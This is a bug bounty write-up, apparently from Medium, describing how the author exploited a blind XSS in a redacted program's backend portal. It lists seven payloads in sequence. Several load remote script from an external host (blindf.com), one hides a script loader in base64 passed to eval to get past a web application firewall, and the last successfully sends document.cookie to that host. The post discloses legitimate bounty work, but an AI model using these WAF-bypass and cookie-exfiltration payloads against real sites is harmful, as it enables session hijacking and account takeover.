Blind Xss (A mind game to win the battle)

In this write-up, I will explain how I exploited a blind XSS in the backend portal of a program.

I will not take much time and keep the write-up simple and point to point.

It was a private program so we will call it https://redacted.com.

I used https://blindf.com in order to exploit it. It's a platform/tool/framework to find blind XSS.

Attack Starts:

  1. Found a form on https://redacted.com
  2. I put Bhtml payload + BXSS payload in the text field

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"></script><script src=https://blindf.com/bx.php></script>

Result: WAF stopped me to submit the form.

3. I removed the BXSS payload. Now the payload was

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>

Result: WAF did not stop me and I successfully submitted the form. Next day Blindf confirmed the BHTML payload execution in the backend. Now It’s time to submit the Bxss payload. Because I knew that the backend portal is vulnerable and I just have to submit the Bxss payload.

4. Next Payload used. BHTML + BXSS

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>"><svg onload='with(top)body.appendChild(createElement("script")).src="https://blindf.com/bx.php"'>

Result: WAF did not stop me and I successfully submitted the payload. But again only BHTML payload worked and BXSS did not. Now again, its time to modify the payload.

5. Next payload used. BHTML + BXSS

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">   sfds"><base href="https://blindf.com"><script nonce='secret' src='./bx.php'></script>

Result: WAF stopped me and I could not submit the form. Frustration was on the peak. Again its time to change the payload.

6. Next payload used. BHTML + BXSS

Payload:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYmxpbmRmLmNvbS9ieC5waHAiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>

Result: Bypassed the WAF but again only BHTML worked and BXSS failed. Now it was not the time of payload modification but thinking about the situation.

Situation step by step:

  • I used BHTML + BXSS payloads.
  • Some Bxss payloads bypassed the WAF but did not execute in the backend portal where Bhtml payloads were going well and I was receiving back response from my BHTML payloads.
  • Maybe something was stopping my remote js file from execution. [CORS or Same-origin policy]
  • So I have to execute BXSS without including remote js file.
  • But how can I confirm the payload execution in the backend if I just show an alert popup to them
  • “<img” tag was working but I could not include remote js file.
  • I have to make a payload that can respond back and confirm js code execution.

7. Now it’s time to modify the payload and attack again.

Payload used:

<img src="https://blindf.com/b.php?c=redacted_bhtml_execution"/>">  <img src=https://blindf.com/a.jpg onload=this.src='https://blindf.com/oc.php/?c='+document.cookie>

Result: WAF bypassed. Bhtml payload executed. Bxss payload executed and I got the cookie value.

Severity: Critical (9 ~ 10)

Bounty: $1000

Written by

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store